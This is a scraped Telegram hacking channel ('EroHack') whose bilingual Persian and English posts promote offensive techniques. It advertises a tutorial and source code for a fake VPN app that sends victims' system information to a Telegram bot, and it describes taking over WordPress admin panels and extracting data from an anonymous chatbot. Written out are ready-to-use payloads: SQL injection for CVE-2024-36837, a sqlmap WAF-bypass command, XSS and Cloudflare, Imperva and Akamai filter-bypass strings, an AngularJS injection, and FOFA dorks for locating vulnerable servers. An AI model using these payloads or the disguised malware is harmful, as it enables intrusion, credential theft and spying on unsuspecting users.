Eʀᴏ ··ʜᴀᴄᴋ··
4.83K subscribers
65 photos
27 videos
10 files
104 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
Media is too big
VIEW IN TELEGRAM
آموزشی که قولش رو داده بودم

ارسال اطلاعات سیستم به بات تلگرامی در قالب آپ فیلترشکن💀
ری‌اکشن فراموش نشه👍
Training to send system information in the form of a secret filter breaking application. Don't forget
support and reaction.
Do not forget the reaction👍

🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯3🔥2👾2💯1🎃1
source code.zip
2.9 KB
🔺مربوط به آموزش بالا🔹
password: @erohack0
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥52👍1💯1
😒SQL Injection in WordPress Plugin

Fofa Query :: body="/wp-content/plugins/email-subscribers/" 2-
publicwww : "/wp-content/plugins/email-subscribers/"


#sql #sql_injection
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥21💯1
This media is not supported in the widget
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6👎3🫡1
⭐️CVE-2024-23692 POC - Unauthenticated RCE Flaw in Rejetto HTTP File Server

Fofa Dork: "HttpFileServer" && server=="HFS 2.3m"


🌐Exploit

#Exploit #Cve #Poc

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3💯2🔥1🎃1👾1
🪱CVE-2024-36837 - SQLI Injection

🔪Payload:
0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334


#CVE #SQLI #Payload
✍️✍️✍️✍️✍️✍️✍️✍️✍️✍️
✈️EroHack
Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5💯1🎃1
🪳SQLmap Tamper Scripts - WAF bypass

sqlmap -u 'site.com/search.cmd?for…' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --no-cast --no-escape --dbs --random-agent


#WAF #Bypass #sqlmap
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🎃3🔥1
🪐نفوذ به سایت وردپرسی با استفاده از پلاگین

توضیحات:
ما با استفاده از یک پلاگین وردپرس تونستیم به پنل پیشخوان وردپرس دسترسی پیدا کنیم و صفحه لاگین رو به بات تلگرام ارسال کنیم و یک یوزر با سطح دسترسی ادمین ایجاد کنیم.
Using the WordPress plugin, we were able to access the WordPress counter panel and send the login page to the Telegram bot and create a user with admin access
level.

🌟
برای آپلود آموزش ری‌اکشن فراموش نشه.
👁
React to embed the tutorial.

🔸🔸🔸🔸🔸🔸🔸🔸🔸🔸
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19🔥3🤣3🫡3👾1
🏔Fuzzing Subdomain with WFUZZ

wfuzz -c -w subdomains -u "FUZZ[.]target" --sc 200,301,301,401 -Z


#bugbountytips #bugbounty

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👾2💯1
Media is too big
VIEW IN TELEGRAM
⚡️آموزش نفوذ به پنل وردپرس با پلاگین

توضیحات:
با استفاده از یک پلاگین ساده تونستیم آدرس صفحه لاگین ادمین رو پیدا کنیم و یک کاربر با سطح دسترسی ادمین ایجاد کنید.


#WordPress #hack #Payload
✍️✍️✍️✍️✍️✍️✍️✍️✍️✍️
✈️EroHack
Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍1🎃1🫡1👾1
Security-WP.zip
1.4 KB
⚪️مربوط به پست بالا⚪️
pass: @erohack0
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯7👍1💯1
😠SQLI Injection
CVE: 2024-36837

💻Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334 


#BugBounty #Tips
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6💯1👾1
😀XSS in Office.com. The + made a difference.

Payload:‍‍‍
`'>+<script>alert()</script>`

#BugBounty #Tips #XSS

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8💯2🎃1
🔥CLOUDFLARE BYPASS (Xss)

🖥PAYLOAD:
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>


#Bypass #Xss #cloudflare
✍️✍️✍️✍️✍️✍️✍️✍️✍️✍️
🔝EroHack
💜Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍2💯2🫡1
This media is not supported in your browser
VIEW IN TELEGRAM
🤨10🗿2👎1🔥1😐1
Eʀᴏ ··ʜᴀᴄᴋ··
Video message
سلام درود🫡
محتوای ویدئو مسیج بالا اینکه دیروز من تونستم به اطلاعات یک ربات چت ناشناس نفوذ کنم و دیتا رو بیرون بکشم.
میتونید از لینک زیر رایت‌آپ رو بخونید
و استفاده کنید.

hello everyone
The content of the video message above is that yesterday I was able to hack into an anonymous chatbot and mine the data.
You can read and use the article from the link below.

write-up:
https://medium.com/@EroHack/write-up-telegram-anonymous-chat-hack-bot-ad3497f813ed


برای قرار دادن آموزش ری‌اکشن بزنید.🙌🏻
React to insert tutorial.🙌🏻
🔥17😐3🎃3👍1👾1
XSS WAF Bypass:

Imperva
<details/open/id="&quote;"ontoggle=[JS]>


Amazon
<details/open/id="&quote;"ontoggle=[JS]>


Akamai
<details open id="' &quote;'"ontoggle=[JS]>


EroHack
🗯Boost
📣Twitter
👍61🤨1
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «سلام درود🫡 محتوای ویدئو مسیج بالا اینکه دیروز من تونستم به اطلاعات یک ربات چت ناشناس نفوذ کنم و دیتا رو بیرون بکشم. میتونید از لینک زیر رایت‌آپ رو بخونید و استفاده کنید. hello everyone The content of the video message above is that yesterday I was able…»
⚠️AngularJS Client-Side Template Injection as XSS payload for 1.2.24-1.2.29

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}


#Xss #Payload

EroHack
🗯Boost
📣Twitter
🔥51👍1💯1🤨1
Media is too big
VIEW IN TELEGRAM
Introducing the "VulnScan" tool

توضیحات:
ابزار "VulnScan" یک که در زمینه جمع آوری اطلاعات از یک سایت طراحی شده و به شما کمک میکنه اطلاعات مهمی از تارگت خودتون پیدا کنید.
امکانت ابزار از جمله پورت‌اسکن، آسیب پذیری باگ LFI، آسیب پذیری باگ XSS و غیره است.
اطلاعات تکمیلی رو میتونید در فیلم بالا مشاهده کنید.
برای تهیه ابزار میتونید به آیدی زیر پیام بدید.


Description:
The VulnScan tool is designed to gather information from a site and help you find important information about your target.
Features of this tool include port scanning, "LFI" bug vulnerability, "XSS" bug vulnerability, etc.
Additional information can be seen in the video above.
To get the tool, you can send a message to the following address. There is a discount for the first ten people.


#tool #webhacking #bugbounty #XSS

🆔 @gorunero
EroHack
🗯Boost
📣Twitter
👍8🔥2👾1
سلام خدمت دوستان عزیز ویس بالا رو
گوش بدید شاید به کارتون امد.

ID: @gorunero
👍9🤣4🔥1👾1